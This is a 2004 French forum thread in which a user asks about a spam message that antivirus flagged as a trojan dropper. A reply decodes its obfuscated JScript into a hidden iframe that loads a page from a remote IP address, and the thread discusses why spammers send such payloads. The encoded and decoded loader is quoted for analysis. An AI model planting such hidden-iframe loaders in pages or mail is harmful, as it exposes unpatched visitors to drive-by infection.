OVH Cloud OVH Cloud

Zeroline

2 réponses
Avatar
Txo
Bonjour

Depuis quelques temps je reçois régulièrement des courriers qui
ressemblent aux tonnes de spam qu'on reçoit habituellement. Mais là ils
sont triés par clamav et dénoncés comme Trojan.Dropper.VBS.Zerolin-enc.
Je soupçonne cette partie du message :

<script language=3D"JScript.Encode">#@~^nwAAAA=3D=3D~@#@&[Km!:+ YcADbYn`E@=
!(o"bHA~?"Z'r4OYa)Jz+!+ O, FF+R8*f&^kxV 4YhVr~qq9:C{ccZP_3qVCP'WcT~wIbt3A}=
IfA]x!,?;I6SJ(gMxJ GJ,/Oz^+'E[b/2Vmz=3DxG +pJ@*@!z&oIzH3@*E#I@#@&wCoAAA=3D=
=3D^#~@</script>

le reste n'étant que des mots aléatoirement choisi et une adresse
d'image et de site en chine.

Ma question : Les troyens ne s'envoyant pas, il me semble, eux même,
cela étant réservé aux virus ou vers, il y a forcément un acte
volontaire et direct des spammeurs. Ce qui me semblerait une étape
supplémentaire dans les méthode des spammeurs.

Qu'en pensez vous ? Où mon raisonnement se plante ?


--
-+- Dominique Marin http://txodom.free.fr -+-
«La foi, semelle inusable pour qui n'avance pas.»
-+- Michaux, Henri -+-

2 réponses

Avatar
Txo
Dans ce fil, Txo nous a susurré :

Qu'en pensez vous ? Où mon raisonnement se plante ?


Si c'est à chaque faute d'orthographe, Aïe.

--
-+- Dominique Marin http://txodom.free.fr -+-
«La foi, semelle inusable pour qui n'avance pas.»
-+- Michaux, Henri -+-

Avatar
Nicob
On Sun, 22 Aug 2004 15:24:04 +0200, Txo wrote:

<script language="JScript.Encode">#@~^nwAAAA==~@#@&[Km!:+
YcADbYn`E@= !(o"bHA~?"Z'r4OYa)Jz+!+ O, FF+R8*f&^kxV
4YhVr~qq9:C{ccZP_3qVCP'WcT~wIbt3A}= IfA]x!,?;I6SJ(gMxJ
GJ,/Oz^+'E[b/2Vmz=xG +pJ@*@!z&oIzH3@*E#I@#@&wCoAAA= > =^#~@</script>


Ce qui donne :

<script language="JScript.Encode">document.write('<IFRAME
SRC="http://202.99.172.153/link.html" WIDTHD0 HEIGHTD0 FRAMEBORDER=0
SCROLLING="no" style="display:none;"></IFRAME>');</script>

Le lien apparait comme mort, mais je déconseille tout de même aux
Windowsiens non "à jour" d'aller y faire un tour avec IE.

le reste n'étant que des mots aléatoirement choisi et une adresse
d'image et de site en chine.


Classique : depuis ce Samedi, j'en ai vu passer 430 comme ça :(

Ma question : Les troyens ne s'envoyant pas, il me semble, eux même,
cela étant réservé aux virus ou vers, il y a forcément un acte
volontaire et direct des spammeurs. Ce qui me semblerait une étape
supplémentaire dans les méthode des spammeurs.


C'est soit un spammer qui profite de son mailing pour monter une armée de
zombies, soit des blackhats qui dissimulent sous des allures de spams
leurs attaques contre les end-users.

[ Frederic va me tuer pour avoir employer autant de mots anglais dans une
seule phrase :) ]

Il y a eu un thread à ce sujet sur Bugtraq ce mois-ci :
http://seclists.org/lists/bugtraq/2004/Aug/index.html#183


Nicob